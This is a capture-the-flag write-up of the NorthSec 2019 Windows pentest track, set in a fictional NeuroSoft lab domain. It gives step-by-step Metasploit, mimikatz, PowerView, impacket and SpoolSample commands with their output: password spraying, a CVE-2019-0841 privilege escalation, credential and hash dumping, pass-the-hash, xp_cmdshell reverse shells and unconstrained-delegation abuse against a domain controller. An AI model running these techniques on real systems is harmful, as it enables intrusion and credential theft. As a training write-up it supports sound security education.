
ETTIC is the Offensive Security team at Desjardins. We specialize in Penetration Testing, Threat Modeling, Application Security, Offensive Proactive Research, Purple Teaming, and Adversary Simulation.

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NorthSec 2019 — Windows Track Writeup

Martin Dubé
Published in
32 min readJun 3, 2019

For many years, my friend Stéphane Sigmen and I, Martin Dubé, were involved in the CTF of, a great conference and on-site CTF event that occurs in November since 2009 and located in Quebec City. Every year was an opportunity to raise the bar and I think that we succeeded. In 2018, we were about to retire from the amazing but time-consuming CTF scene to focus on other projects when we were invited to join the huge organization of NorthSec as Challenge Designers in order to build a Windows Pentest Track for 75 teams of 8 players, for a total of 600 players. We immediately jumped at the opportunity. Could we raise the bar higher?

This year’s theme was around a company named NeuroSoft founded by Neil Williamson, a prominent neuroscientist who has made incredible breakthroughs in our understanding of the brain. A series of events occurred so the company was eventually taken down by the government. This track featured the remains of Neurosoft internal networks: The main corporate network and a research branch that was acquired in the past.

To build this track, we started in January 2019 by enumerating Windows attacks and takeaways that we wanted include. For instance, we wanted to put in place as many password issues as possible in the track because we believe that this is a huge problem in the industry. We also wanted to put in place recent Windows exploitation techniques that are not always understood well. Finally, we assembled all ideas in a schema and we designed exploitation path that player would need to respect to move forward. Here is the latest version of this schema.

High level design of the exploit path and the optional flags

The track was made of 1x LXD container, running a roundcube/postfix/dovecot stack, and 5x Windows machines, 1x Windows 10 Pro and 4x Windows 2016 core. The webmail was a running in a LXD container. The 375 VMs were running on 5 Advance-4 dedicated server, rented for 1 month. Each server provided 64 cores, 256GB of RAM and 2x 2TB NVME drives. VMs were managed with libvirt and stored in ZFS zvol.

Now, let’s dive into the write-up.

Initial Access on dev.neurosoft.ctf

At the begining of the CTF, the message below was displayed on the scoreboard.

Track Description in the scoreboard

Two information were provided:

  • A list of 150 credentials in the form of user:password
  • A URL to Neurosoft’s webmail (http://mail.neurosoft.ctf)
Overview http://mail.neurosoft.ctf

Spray Webmail

The first objective was very straight forward: Attempt a password spraying attack on the webmail. However, there was a tiny trick. There was a CSRF token in the login form so the player needed to take care of it. The challenge could be solved by using Burp Intruder and by configuring a macro which performed a GET request before every login attempt. A python script could also make it.

Only one mailbox was part of the leak: Jerry’s mailbox.

Pwn Jerry’s mailbox

Once connected in Jerry’s mailbox, there was a three emails to read.

The first email was “Inbox Cleanup” informing that all email inboxes have been wiped out. The player did not know yet but Neurosoft was taken down by the government and they wiped almost all mailboxes. In fact, they deleted the inbox but not the Sent Box and user’s personal folders. Oops…

The second email was “Simplified QA process”. Brandon was actually a QA analyst and sometimes he ran the binaries from Jerry on his laptop. Because he’s lazy, he wrote a bot to automate this process. Of course, that is very dangerous (and sketch) :)

The email “Simplified QA process”

The last email was “CVE-2019–0841”. This email was leaking the presence of a recent privilege escalation vulnerability.

Pwn Brandon’s Workstation

Using the email “Simplified QA process”, the player needed to write a email with subject “Run QA” and attach an .exe to the email. Then, the bot would run the PE and reply if the execution was successful. For instance, if the player sent a powershell script, it would reply that the format is wrong. This step was critical for the rest of the track, so the designers tried to be very explicit.

There were no firewall rules, no anti-virus solution or any hardening configured on this box to make the challenge accessible by anyone.

The following sections use msfvenom and metasploit to demonstrate the exploit path. Payload generations are described in the Payloads section.

Status at this point

msf5 auxiliary(server/socks4a) > sessions -lxActive sessionsId Name Type Checkin? Enc? Local URI Information Connection1 meterpreter x64/windows 29s ago Y ? DEV\brandon @ DEV fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::12:49707 (9000:470:beef::12)

[Optional] Grab a flag in DPAPI

The following is strongly inspired from

The player could find a flag in the credential vault of the user brandon.

meterpreter > load kiwi
meterpreter > kiwi_cmd vault::list
Vault : {4bf4c442-9b8a-41a0-b380-dd4a704ddb28}
Name : Web Credentials
Path : C:\Users\brandon\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Items (0)
Vault : {77bc582b-f0a6-4e15-4e80-61736b6f3b29}
Name : Windows Credentials
Path : C:\Users\brandon\AppData\Local\Microsoft\Vault
Items (0)
kiwi_cmd "\"vault::cred /in:C:\Users\brandon\AppData\Local\Microsoft\Vault\""TargetName : flag / <NULL>
UserName : flag
Comment : <NULL>
Type : 1 - generic
Persist : 3 - enterprise
Flags : 00000000
Credential : FLAG-KrKT4Kw99AmcNr7xzsM84RhYzxVv9hFr
Attributes : 0
TargetName : LegacyGeneric:target=flag / <NULL>
UserName : flag
Comment : <NULL>
Type : 1 - generic
Persist : 3 - enterprise
Flags : 00000000
Credential : FLAG-KrKT4Kw99AmcNr7xzsM84RhYzxVv9hFr
Attributes : 0

The trap here was that it would not show if it was run as SYSTEM, due to the design of DPAPI.

Read Brandon’s emails

A few hints were located in Brandon’s mailbox.

Locate the bot on the workstation

The player could find the powershell script here: C:\users\brandon\Documents\NeurosoftBot. In the script, there was brandon’s credentials, which provided access to mail.neurosoft.ctf but also the domain user brandon.harper.

Access Brandon’s email

There were 3 emails in Brandon’s email.

The first email leaked a welcome password (Welcome1) and a UNC path to a network share(\\files.nsresearch.ctf\users_data). At this point, the player did not have access to the share yet but that could give inspiration for next steps.

The second email was a password policy notice informing employees to never use the company name as a password.

We’ve seen this vulnerability in almost every environment we’ve worked in.

The third email informed the player that svc.neurosoft.ctf (still unknown at this stage) is configured with Unconstrained Delegation, a very dangerous functionality.

Elevate to SYSTEM on dev.neurosoft.ctf

Identify the vulnerability

By browsing on the machine, the player could find an uncommon folder located here C:\Program Files\cortesc. The clearly stated that this was a service developed by NeuroSoft, running as SYSTEM.

To perform host reconnaissance, the player could run PowerUp, which gave a few hints, even though it was not the actual vulnerability.

meterpreter > load powershell
meterpreter > powershell_import /home/mdube/shr/git/PowerSploit/Privesc/PowerUp.ps1
meterpreter > powershell_shell

PS > Invoke-allchecks

[*] Checking for unquoted service paths...

ServiceName : cortesc
Path : C:\Program Files\cortesc\cortesc.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users;
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'cortesc' -Path <HijackPath>
CanRestart : True

ServiceName : cortesc
Path : C:\Program Files\cortesc\cortesc.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'cortesc' -Path <HijackPath>
CanRestart : True

The player could get more information about the service with the sc command

C:\Windows\system32>sc query cortesc

WIN32_EXIT_CODE : 1077 (0x435)

C:\Windows\system32>sc qc cortesc

[SC] QueryServiceConfig SUCCESS

BINARY_PATH_NAME : C:\Program Files\cortesc\cortesc.exe
TAG : 0
DISPLAY_NAME : cortesc

However, there was a problem: the current user could not modify the file.

C:\Windows\system32>icacls "C:\Program Files\cortesc\cortesc.exe"
C:\Program Files\cortesc\cortesc.exe NT AUTHORITY\SYSTEM:(I)(F)

Successfully processed 1 files; Failed processing 0 files

Remember the hint in Jerry’s email about CVE-2019–0841? The player needed to exploit this vulnerability in order to change the NTFS permission of this file and replace it with another service binary.

DACL Privilege Escalation

# Download:
# Compile with Visual Studio. IMPORTANT: Choose Release, not Debug.

meterpreter > sessions -i <SHELL>
meterpreter > cd C:\\temp
meterpreter > upload /payloads/vs_build/CVE_2019-0841.exe
meterpreter > shell
C:\temp>.\CVE_2019-0841.exe "C:\Program Files\cortesc\cortesc.exe"

On successful exploitation, this message was printed.

[+] You don't have 'Modify/Write' privileges on this file ...
# Privileged DACL Overwrite EoP
# CVE: CVE-2019-0841
# Exploit Author: Nabeel Ahmed (@rogue_kdc)
# Tested on: Microsoft Windows 10 x32 & x64
# Category: Local

[+] Checking File privileges of C:\Program Files\cortesc\cortesc.exe
[!] Microsoft Edge is running :(
[!] File is in use by NT AUTHORITY\SYSTEM ...
[!] Killing Microsoft Edge ... DONE
[+] Retrying ...
[!] Microsoft Edge is running :(
[!] File is in use by NT AUTHORITY\SYSTEM ...
[!] Killing Microsoft Edge ... DONE
[+] Retrying ...
[!] Microsoft Edge is running :(
[!] File is in use by NT AUTHORITY\SYSTEM ...
[!] Killing Microsoft Edge ... DONE
[+] Retrying ...
[+] Checking if 'settings.dat' file exists ... YES
[!] Attempting to create a hardlink to target ... DONE
[+] Starting up Microsoft Edge to force reset ...
[!] Killing Microsoft Edge again ...
[+] Checking File privileges again ...
[+] Checking File privileges of C:\Program Files\cortesc\cortesc.exe
[+] You have 'Full Control' over this file!

Pop a shell as system

meterpreter > shell
C:\temp>copy "C:\Program Files\cortesc\cortesc.exe" "C:\temp\cortesc_bkp.exe"
meterpreter > upload /payloads/c2nsec/payload_msf_svc_x86.exe C:\\Program\ Files\\cortesc\\cortesc.exe
meterpreter > execute -f sc -a "start cortesc"

From a x86 to x64 shell

The player needed a x64 shell for the next steps. The simplest approach to fix this was to pop a x64 shell from the x86 SYSTEM shell.

meterpreter > cd C:\\temp
meterpreter > execute -f payload_msf_x64.exe

Status at this point

msf5 auxiliary(server/socks4a) > sessions -lx

Active sessions

Id Name Type Checkin? Enc? Local URI Information Connection
-- ---- ---- -------- ---- --------- ----------- ----------
1 meterpreter x64/windows 29s ago Y ? DEV\brandon @ DEV fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::12:49707 (9000:470:beef::12)
2 meterpreter x86/windows 14s ago Y ? NT AUTHORITY\SYSTEM @ DEV fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8080 -> 9000:470:beef::12:49711 (9000:470:beef::12)
3 meterpreter x64/windows 12s ago Y ? NT AUTHORITY\SYSTEM @ DEV fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::12:49733 (9000:470:beef::12)

Recon on dev.neurosoft.ctf

[Optional] Reverse cortesc.exe

Using dotPeek, the player could decompile the program and grab a flag “XORed” with a 1 byte key. The flag was located in the OnStop() function.

protected override void OnStop()
// Update the service state to Stop Pending.
ServiceStatus serviceStatus = new ServiceStatus();
serviceStatus.dwCurrentState = ServiceState.SERVICE_STOP_PENDING;
serviceStatus.dwWaitHint = 100000;
SetServiceStatus(this.ServiceHandle, ref serviceStatus);

String encodedFlag = "DNCE/U4p6i;FQ7C@xhgthuDPPf4hFzGVWAWEO";
String flag = xorIt("\x02", encodedFlag);

eventLog1.WriteEntry(String.Concat("In OnStop. ", flag));

// Update the service state to Stopped.
serviceStatus.dwCurrentState = ServiceState.SERVICE_STOPPED;
SetServiceStatus(this.ServiceHandle, ref serviceStatus);

This is the only flag that was not submitted by any team.

Grab credentials

Being SYSTEM opened the door to a lot of possibilities. Let’s spawn mimikatz !

meterpreter > getsystem
meterpreter > load kiwi
meterpreter > creds_all

[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials

Username Domain NTLM SHA1 DPAPI
-------- ------ ---- ---- -----
Administrator NEUROSOFT f09ac08f9b0b722ed0debcd38bcf2adc 0ae6145b57c3480e17e24e6e172ae14467d2c224 3d42a73fb77bf29b15f06122d07a0192
DEV$ NEUROSOFT b79fdd5a00fdc3440b502721b30d5ca8 dea4ed6f40d7a22d2e0fcdd514e104b983ebbec7
brandon DEV 11cf6f220caafeffcec1804db862167b fc57967d43a25983ac7b93fa9374837080b4f5bc
brandon.harper NEUROSOFT 2d1c1ee59ad905f59f346e5414ef4669 635776916c74bbfdeec2c8718f562543f9b9a4b8 1f40d5412cce6115fa7b5afbe35885b5

wdigest credentials

Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator NEUROSOFT (null)
brandon DEV (null)
brandon.harper NEUROSOFT (null)

kerberos credentials

Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator NEUROSOFT.CTF (null)
DEV$ neurosoft.ctf d2 b4 3c 79 1a 65 8c 03 dd fe 98 be 29 44 d2 ae 0e ab d7 88 fa 00 5c b5 a1 c2 98 6d e4 77 51 fd 91 e0 b8 28 a0 40 f2 6c 28 c8 4c a9 aa 44 01 6e 1c 86 34 80 94 82 86 0d 83 6c d5 16 fa 40 a7 9f 1b 5f e8 c3 2f 09 d1 11 82 c3 3e 60 26 ff e4 76 7a 5f 9e 7e 7d c1 5d 19 39 65 07 a9 03 58 01 fc 95 9d a2 a4 86 29 5a 12 41 f2 5d 6a 68 be b7 8d bb 90 a2 36 fe 05 1f 53 44 f7 18 33 14 73 45 c2 b5 66 17 b8 f8 73 c8 7f 5b 99 db c7 ba 73 3b 26 ff bd 70 b5 c0 55 21 92 69 be 5f 88 b5 7e c8 1c 79 7a 9d 58 16 aa 3b ce b4 35 77 87 11 bc c8 29 85 ad a4 c1 ff 63 20 ec c6 b0 c9 40 b9 06 a9 d3 15 6c 87 72 e9 14 07 7b 1c ee 72 d4 d3 ea 53 a1 ba 9b 06 63 aa db a8 f0 1b 15 96 33 f8 b1 65 a7 91 79 59 b2 e1 2b fb 1d 1a 98 af 61 7f bb 14 e7
brandon DEV (null)
brandon.harper NEUROSOFT.CTF (null)
dev$ NEUROSOFT.CTF (null)

The hash of brandon.harper could be used to perform pass-the-hash.

Anecdote: In the track design, it was expected to see only hashes, not passwords, in the output of sekurlsa::logonpasswords. HOWEVER, during the preparation, we installed SQL Management Studio, which adds an entry in the registry keys allowing passwords to be saved in cleartext in memory. As a result, the credentials of both brandon and NEUROSOFT\brandon.harper were visible in cleartext. If you thought that credentials are never stored in a reversible format on Windows 10, note that there are many exceptions. The same behavior occurs when you install Visual Studio. Here are more details.

Impersonate NEUROSOFT\brandon.harper

A domain user needed to be impersonated to query the precious object of the Active Directory. Here are a few techniques that could allow impersonation.

# Via metapsloit only (ptt)
## This will NOT work with Windows Defender enabled
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token NEUROSOFT\\brandon.harper
meterpreter > dir \\\\files.nsresearch.ctf\\users_data
meterpreter > execute -f payload_msf_x64.exe -t
meterpreter > rev2self

# Via metapsloit and mimikatz v2.1.1 (ptt)
## This will NOT work with Windows Defender enabled
## Must change many strings and recompile to avoid AV
meterpreter > cd C:\\temp
meterpreter > upload /payloads/mimikatz/mimi_x64.exe
meterpreter > shell
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::ptt [0;f7ec]-2-1-40e10000-brandon.harper@krbtgt-NEUROSOFT.CTF.kirbi
mimikatz # exit
C:\temp> .\payload_msf_x64
C:\temp> dir \\files.nsresearch.ctf\users_data

# Via metapsloit (pth)
## Worked with Windows Defender enabled
meterpreter > load kiwi
meterpreter > kiwi_cmd privilege::debug
meterpreter > kiwi_cmd "\"sekurlsa::pth /user:brandon.harper /domain:neurosoft.ctf /ntlm:2d1c1ee59ad905f59f346e5414ef4669 /run:payload_msf_x64.exe\""
meterpreter > background
msf > sessions -i NEW_SHELL
meterpreter > shell
C:\temp>dir \\files.nsresearch.ctf\users_data

Browse users_data network share

With a shell with credentials of a domain user, the player could start his network recon. He could first browse the network share found previously in an email: \\files.nsresearch.ctf\users_data.

meterpreter > dir \\\\files.nsresearch.ctf\\users_data
Listing: \\files.nsresearch.ctf\users_data

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2019-03-16 11:57:46 -0400 alfred.lebrun
40777/rwxrwxrwx 0 dir 2019-03-22 19:02:38 -0400 brandon.harper
40777/rwxrwxrwx 0 dir 2019-04-29 23:27:34 -0400 jerry.compass
40777/rwxrwxrwx 0 dir 2019-03-17 22:19:00 -0400 linda.costa
40777/rwxrwxrwx 0 dir 2019-04-29 23:11:46 -0400 neil.williamson
40777/rwxrwxrwx 0 dir 2019-03-22 19:01:03 -0400 stuart.fagan
40777/rwxrwxrwx 0 dir 2019-05-07 23:57:29 -0400 support_tools
40777/rwxrwxrwx 0 dir 2019-03-17 20:43:17 -0400 svcMoonCrackle
40777/rwxrwxrwx 0 dir 2019-03-16 14:33:36 -0400 test.user
40777/rwxrwxrwx 0 dir 2019-03-17 22:13:43 -0400 zim.armstrong

All folders except support_tools contained a flag and was accessible only by the associated domain user. Every user was featuring a different password vulnerability. The write-up for these can be found here.

Flag in an Alternate Data Stream

From NEUROSOFT\brandon.harper, the player could access the associated flag.txt file easily like this.

meterpreter > cat \\\\files.nsresearch.ctf\\users_data\\brandon.harper\\flag.txt
Almost there. Try harder.

IT’S A TRAP! It was in fact in an Alternate Data Stream.

meterpreter > load powershell
meterpreter > powershell_shell
PS > cd \\files.nsresearch.ctf\users_data\brandon.harper
PS > dir
PS > Get-Item -path flag.txt -Stream *
PS > Get-Content -path flag.txt -Stream Flag

Status at this point

msf5 auxiliary(server/socks4a) > sessions -lx

Active sessions

Id Name Type Checkin? Enc? Local URI Information Connection
-- ---- ---- -------- ---- --------- ----------- ----------
1 meterpreter x64/windows 29s ago Y ? DEV\brandon @ DEV fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::12:49707 (9000:470:beef::12)
2 meterpreter x86/windows 14s ago Y ? NT AUTHORITY\SYSTEM @ DEV fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8080 -> 9000:470:beef::12:49711 (9000:470:beef::12)
3 meterpreter x64/windows 12s ago Y ? NT AUTHORITY\SYSTEM @ DEV fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::12:49733 (9000:470:beef::12)
4 meterpreter x64/windows 32s ago Y ? NEUROSOFT\brandon.harper @ DEV fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::12:49753 (9000:470:beef::12)

Recon the first AD: dc.neurosoft.ctf

As in every pentest assessment, as soon as host recon is completed and that a domain account is compromised, a logical next step consist of running reconnaissance activities on the Domain.

Metasploit has most of the tools to perform recon. However, PowerSploit is much simpler to use. Here are a few one-liners inspired from Harmj0y’s cheatsheet.

meterpreter > load powershell
meterpreter > powershell_import /home/mdube/shr/git/PowerSploit/Recon/PowerView.ps1

## Computers
Get-DomainComputer -domain nsresearch.ctf

## Groups
Get-DomainGroup -Properties name,description,whencreated
Get-DomainGroup -Properties name,description,whencreated -domain nsresearch.ctf

## Groups Membership
Get-DomainGroupMember 'Domain Admins'
Get-DomainGroupMember -domain nsresearch.ctf 'Domain Admins'

## Users
Get-DomainUser -Properties sAMAccountName,description
Get-DomainUser -Properties sAMAccountName,description -domain nsresearch.ctf

## Trusts

## SPNs
Get-DomainUser -SPN

## Delegation
Get-DomainComputer -Unconstrained
Get-DomainUser -AllowDelegation -AdminCount
Get-DomainComputer -domain nsresearch.ctf -Unconstrained
Get-DomainUser -domain nsresearch.ctf -AllowDelegation -AdminCount

Pwn svc.neurosoft.ctf

To get access to svc.neurosoft.ctf, the player first needed to decrypt the VBE located in C:\Users\brandon.harper\Documents\sqldev grab credentials and connect to the MSSQL server. From there, the player could escalate to SYSTEM by enabling xp_cmdshell and uploading a payload.

Here are the detailed steps.

Find the file

... [perform recon] ...

C:\Users\brandon.harper>dir Documents\sqldev
dir Documents\sqldev
Volume in drive C has no label.
Volume Serial Number is 843E-DDE5

Directory of C:\Users\brandon.harper\Documents\sqldev

2019-04-14 08:40 PM <DIR> .
2019-04-14 08:40 PM <DIR> ..
2019-03-23 11:37 AM 633 neurodev_sql_chips_check.vbe
1 File(s) 633 bytes
2 Dir(s) 21,332,369,408 bytes free

Find creds in VBE script

The player could decode the VBE by running publicly available tools. We did it with this one.

The simplest approach was to upload the vbs script on the machine and then decode it.

meterpreter > upload /home/mdube/shr/git/ctf-2019/challenges/mdube_sigs/DEV_sqldev_vbe/decode_vbe.vbs
meterpreter > shell
C:\temp>cscript decode_vbe.vbs C:\Users\brandon.harper\Documents\sqldev\neurodev_sql_chips_check.vbe

Const adOpenStatic = 3
Const adLockOptimistic = 3

Set objConnection = CreateObject("ADODB.Connection")
Set objRecordSet = CreateObject("ADODB.Recordset")

objConnection.Open _
"Provider=SQLOLEDB;Data Source=svc.neurosoft.ctf;" & _
"Initial Catalog=neurodevdb;" & _
"User ID=sa;Password=FLAG-wRYreyPLdsYRgiwm9NGsNSyA2Z9uTJ;"

objRecordSet.Open "SELECT * FROM DevChipTargets", _
objConnection, adOpenStatic, adLockOptimistic


Wscript.Echo "Number of neurochips deployed: ",objRecordSet.RecordCount,vbCrLf

Get a SYSTEM shell (Solution #1)

The mssql_payload module from metasploit still works very well after all these years.

use windows/mssql/mssql_payload
set SRVHOST ::
set RHOSTS 9000:470:beef::11
set PAYLOAD windows/x64/meterpreter_reverse_ipv6_tcp
set DisablePayloadHandler true
set LHOST <your_ipv6>
set LPORT 8081
#oruse windows/mssql/mssql_payload
set SRVHOST ::1
set RHOSTS 9000:470:beef::11
set EXE::Custom /payloads/c2nsec/payload_msf_x64.exe
set DisablePayloadHandler true

The player could grab the flag here: C:\flag.txt.

meterpreter > cat C:\\flag.txtFLAG-uHTDUrDg6ZqoQP5Ii6YDJuhZCCxH6U

Get SYSTEM shell (Solution #2)

The second solution involves impacket. If you don’t know this collection of python scripts and classes, you should take time to read on it.

$ sa:FLAG-wRYreyPLdsYRgiwm9NGsNSyA2Z9uTJ@svc.neurosoft.ctfSQL> enable_xp_cmdshell[*] INFO(SVC): Line 185: Configuration option ‘show advanced options’ changed from 0 to 1. Run the RECONFIGURE statement to install.[*] INFO(SVC): Line 185: Configuration option ‘xp_cmdshell’ changed from 0 to 1. Run the RECONFIGURE statement to install.SQL> xp_cmdshell whoamint authority\system

The player could grab the flag here: C:\flag.txt.

SQL> xp_cmdshell type c:\flag.txtFLAG-uHTDUrDg6ZqoQP5Ii6YDJuhZCCxH6U

[Optional] Flag in the encrypted column

There was three ways to get this flag.

Solution 1 (The easy way with CLI)

This step needed to be performed from NEUROSOFT\brandon.harper because the encryption key for the column ImplantPass was in stored in his certificate hive.

Use sqlcmd tool with -g option to activate column decryption with the certificate already in the user store.

meterpreter > shell
C:\temp>sqlcmd -S svc.neurosoft.ctf -U sa -P FLAG-wRYreyPLdsYRgiwm9NGsNSyA2Z9uTJ -g



select table_name, column_name from neurodevdb.information_schema.columns

table_name column_name
DevChipTargets ChipVesion
DevChipTargets ImplantPass
DevChipTargets Name

(3 rows affected)

USE neurodevdb
select * from DevChipTargets

Changed database context to 'neurodevdb'.
Name ChipVesion ImplantPass
-------------------------------------------------- ---------- --------------------------------------------------
Serenity Cunningham 1.0 31xKOjmqrGhF5plExKwB
Usaamah Barron 0.9 YJmi6v9qH5rFiioZW5oh
Oriana Sheldon 1.0 31xKOjmqrGhF5plExKwB
Juliet Regan 1.1 gvSzEbzwy3665PlMgJkz
Manahil Butt 1.0 31xKOjmqrGhF5plExKwB
Charly Farrow 2.0 DMB6sYhEWd7SvzcKZqhv
Andreas Welsh 1.1 gvSzEbzwy3665PlMgJkz
Daanyal Obrien 1.1 gvSzEbzwy3665PlMgJkz
Campbell Barber 1.0 31xKOjmqrGhF5plExKwB
Kaan Prince 0.9 YJmi6v9qH5rFiioZW5oh
Renesmee Cardenas 1.0 31xKOjmqrGhF5plExKwB
Caelan Mullen 0.9 YJmi6v9qH5rFiioZW5oh
Zacharias Wilkerson 0.9 YJmi6v9qH5rFiioZW5oh
Esmay Eastwood 1.1 gvSzEbzwy3665PlMgJkz
Roberta Cotton 1.1 gvSzEbzwy3665PlMgJkz
Piper Burrows 1.0 31xKOjmqrGhF5plExKwB
Deborah Cordova 2.0 FLAG-wVLX58txoVDIFacSsi7XBcS5lxPrQwL
Neil Worthington 0.9 YJmi6v9qH5rFiioZW5oh
Vivek Forrest 1.0 31xKOjmqrGhF5plExKwB
Finnian Mellor 1.1 gvSzEbzwy3665PlMgJkz

Solution 2 (The easy way with GUI)

This step needed to be performed from NEUROSOFT\brandon.harper because the encryption key for the column ImplantPass was in stored in his certificate hive. The player could use RDP and install SQL Management Studio to get the flag.

The player needed to open SQL Management Studio on the computer with imported certificate and add the line below in the advanced options.

column encryption setting=enabled

Then, by browsing to the database neurodevdb, table devchiptarget, the flag was in the Deborah Cordova entry.

Solution 3 (The hard way)

Load mimikatz module and export current user certificates.

meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.1.1 20180925 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( )
## \ / ## >
'## v ##' Vincent LE TOUX ( )
'#####' > / ***/


meterpreter > kiwi_cmd crypto::stores
Asking for System Store 'CURRENT_USER' (0x00010000)
0. My
1. Root
2. Trust
3. CA
4. UserDS
5. TrustedPublisher
6. Disallowed
7. AuthRoot
8. TrustedPeople
9. ClientAuthIssuer
11. SmartCardRoot

meterpreter > kiwi_cmd crypto::certificates
* System Store : 'CURRENT_USER' (0x00010000)
* Store : 'My'

0. Always Encrypted Auto Certificate1
Key Container : 7f0090a8926c247f1e72626509d63e54_c77f5831-6d76-4661-b780-6dc87636cf03
Provider : Microsoft RSA SChannel Cryptographic Provider
Provider type : RSA_SCHANNEL (12)
Type : AT_KEYEXCHANGE (0x00000001)
Exportable key : YES
Key size : 2048

meterpreter > kiwi_cmd "\"crypto::certificates /store:my /export"\"
* System Store : 'CURRENT_USER' (0x00010000)
* Store : 'my'

0. Always Encrypted Auto Certificate1
Key Container : 7f0090a8926c247f1e72626509d63e54_c77f5831-6d76-4661-b780-6dc87636cf03
Provider : Microsoft RSA SChannel Cryptographic Provider
Provider type : RSA_SCHANNEL (12)
Type : AT_KEYEXCHANGE (0x00000001)
Exportable key : YES
Key size : 2048

Base64 of file : CURRENT_USER_my_0_Always Encrypted Auto Certificate1.der
Public export : OK - 'CURRENT_USER_my_0_Always Encrypted Auto Certificate1.der'

Base64 of file : CURRENT_USER_my_0_Always Encrypted Auto Certificate1.pfx
Private export : OK - 'CURRENT_USER_my_0_Always Encrypted Auto Certificate1.pfx'

Download CURRENT_USER_my_0_Always Encrypted Auto Certificate1.pfx. Import this certificate on a Windows machine with SQL Management Studios installed.

Double click on the pfx file to launch certificate import wizard

  • Store location: Current User
  • Select filename
  • Enter password: mimikatz
  • Keep option Automaticaly select …

Then open SQL Management studios and add the line below in the advanced options.

column encryption setting=enabled

Then, by browsing to the database neurodevdb, table devchiptarget, the flag was in the Deborah Cordova entry.

Status at this point

msf5 exploit(windows/mssql/mssql_payload) > sessions -lxActive sessionsId Name Type Checkin? Enc? Local URI Information Connection
— — — — — — — — — — — — — — — — — — — — — — — — — — —
1 meterpreter x64/windows 16s ago Y ? DEV\brandon @ DEV fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::12:49720 (9000:470:beef::12)
2 meterpreter x86/windows 14s ago Y ? NT AUTHORITY\SYSTEM @ DEV fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8080 -> 9000:470:beef::12:49721 (9000:470:beef::12)
3 meterpreter x64/windows 10s ago Y ? NT AUTHORITY\SYSTEM @ DEV fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::12:49722 (9000:470:beef::12)
4 meterpreter x64/windows 55s ago Y ? NEUROSOFT\brandon.harper @ DEV fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::12:49733 (9000:470:beef::12)
5 meterpreter x64/windows 29s ago Y ? NT AUTHORITY\SYSTEM @ SVC fd00:1337:1:0:9eeb:e8ff:fe1c:ebaf:8081 -> 9000:470:beef::11:54535 (9000:470:beef::11)

Pwn dc.neurosoft.ctf

At this point, the player got SYSTEM privileges on 2 out of the 3 boxes of the neurosoft.ctf domain. The only remaining box was dc.neurosoft.ctf, the Domain Controller.

Identify Vulnerability

A common approach to compromise a DC in the industry is to compromise a user that is a member of the “Domain Admin” group. However, only Administrator was member of this group and this account was not connected anywhere. In addition, his password was neither stored in a file, nor configured in a weak manner. The player needed to be creative.

C:\temp>net group “Domain Admins” /domain
The request will be processed at a domain controller for domain neurosoft.ctf.
Group name Domain Admins
Comment Designated administrators of the domain
Members— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
The command completed successfully.

The player should have already identified during the domain recon phase that svc.neurosoft.ctf is configured with unconstrained delegation.

meterpreter > load powershell
meterpreter > powershell_import /home/mdube/shr/git/PowerSploit/Recon/PowerView.ps1
meterpreter > powershell_shell
PS > Get-DomainComputer -Unconstrained -Properties cn,useraccountcontrolcn useraccountcontrol
-- ------------------
PS > Get-DomainUser -AllowDelegation -AdminCount -Properties cn,useraccountcontrolcn useraccountcontrol
-- ------------------

Per design, we have put in place two methods to get Domain Admins privileges on the domain. Unfortunately, the second method was screwed because the password of the computer account of the Domain Controller CHANGED during the preparation of the track. You will find the details below.

Method 1 — Unconstrained Delegation

Year 2018 was a rough one for Microsoft. Harmj0y made public that Forest Trusts ARE NOT security boundaries on his blog. This article demonstrates how an attacker can compromise a Domain Controller by abusing Unconstrained Delegation (and much more).

To make it short, when a user authenticates on a server configured with Unconstrained Delegation, this server temporary save the user’s Ticket Granting Ticket (TGT) in memory for eventual delegation purpose. Here, the player could trick svc.neurosoft.ctf to authenticate to dc.neurosoft.ctf by exploiting the Printer Bug. This tool could be used to trigger the attack. To read the TGT, the player could use kekeo, mimikatz or rubeus.

For detailed explanation of advanced attacks on Windows, we invite you to take a look at harmj0y’s blog or PyroTek3’s articles.

## Step 1: from dev.neurosoft.ctf and loggued as brandon.harper
## Download:
## Compile in Visual Studio
meterpreter > upload /payloads/vs_build/SpoolSample.exe
meterpreter > shell
C:\temp>.\SpoolSample.exe dc.neurosoft.ctf svc.neurosoft.ctf
## Step 2: from svc.neurosoft.ctf and logged as SYSTEM
meterpreter > cd C:\\temp
meterpreter > upload /payloads/mimikatz/mimi_x64.exe
meterpreter > shell
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::ptt [0;2e85a]-2–0–60a10000-DC$@krbtgt-NEUROSOFT.CTF.kirbi

or using Rubeus and channels

